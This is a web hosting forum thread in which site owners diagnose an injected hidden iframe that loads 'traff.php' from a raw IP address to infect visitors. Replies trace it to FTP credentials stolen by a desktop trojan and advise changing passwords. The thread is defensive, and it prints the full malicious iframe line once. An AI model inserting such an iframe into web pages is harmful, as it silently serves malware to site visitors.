What is this Virus doing?

[CFusion]

One of my clients sent to me about two of his site are downloading viruses to visitors.. so i checked it and found this code

Code:

<iframe src='http://81.95.149.77/traff.php' width='1' height='1' style='visibility:hidden'></iframe>

First time: Jags Support told me to remove and check for weekness in coding but index.htm what coding i can find wekkness in any way i checked javascript and really it was a simple html openning soon with logo..no java included. and i removed the code..

again this code appears in this two sites again..

so i made som googling and i found this problem in many websits but there is no solution...

http://www.google.com/search?hl=en&q=%22http%3A%2F%2F81.95.149 .77%2Ftraff.php%22&btnG=Search

Help to find a solution..

[EuroNut]

One of my clients sent to me about two of his site are downloading viruses to visitors.. so i checked it and found this code

Code:

<iframe src='http://xx.xx.xxx.xx/traff.php' width='1' height='1' style='visibility:hidden'></iframe>

Help to find a solution..

It looks like the hackers who attacked customer sites several weeks ago have come back

First, TELL (Not ask) your client to change ALL passwords. Make sure they are complicated, don't use the same password for more than one access type, and if he won't change them, change them for him

Read: http://www.jaguarpc.com/support/kbase/731.html

And also the thread from the previous attack has some useful info (but it's a long read):

Hacker Attack

Good luck!

[CFusion]

Thanks you are the man...
so there is no bugs or security holes and all human fault.

[EuroNut]

so there is no bugs or security holes and all human fault.

Most security holes are created by humans

The bugs are the hackers who find and exploit them.

Seriously, you need to do a complete security check as someone has most likely uploaded that hack because of a weak FTP password or the like. If you have access logs (I don't know if you're on shared/reseller/VPS hosting) you may be able to find out how they did it - If you can find an IP address in your logs it's worth passing the information to Jag Support.

First priority though is to get the passwords changed - Last time they came back for a second visit so you need to shut the unlocked doors.

[Tcarter]

id tend to agree.

if he does not change them within a given amount of time. OR he changes them back to whatever he had them before when you change them.

Id store all his files...them terminate the account. I dont think a simple suspension would stop it.

[CFusion]

Thanks Guys!

[thisisit3]

You are the victim of a VERY wide-spread attack that has been going on for many months. A large number of internet servers/sites have been affected, over 10,000 known networks in fact but who knows the real number.

The attack is based on a complex set of scripts and virii. It starts by using a virus to sniff usernames and passwords on your desktop PC as well as the local network, the virus then sends that info to a central system (IRC-based) and the admins behind this collect the data into a database.

The "collection" of data has been going on for many months, the attackers kept collecting data long before they started the attacks, so they could start the attack in large numbers once they were ready.

They use your account details to access your server/domain via FTP, the automated script downloads known index files, adds the iframe stuff and re-uploads the file into the server.

The script has the ability to: add new iframes, remove iframes, replace/update existing iframes and to scan for other files to infect.

and thats just the tip of the iceberg

[CFusion]

so manly it is starting from my local pc...
I got Nod32 and it detect the script but now stoped detecting is they are ducking or the trojan is more smart now..
from your post maybe they stoped it a while and if they didn't i think nod can detect something suspecios even it is unknown.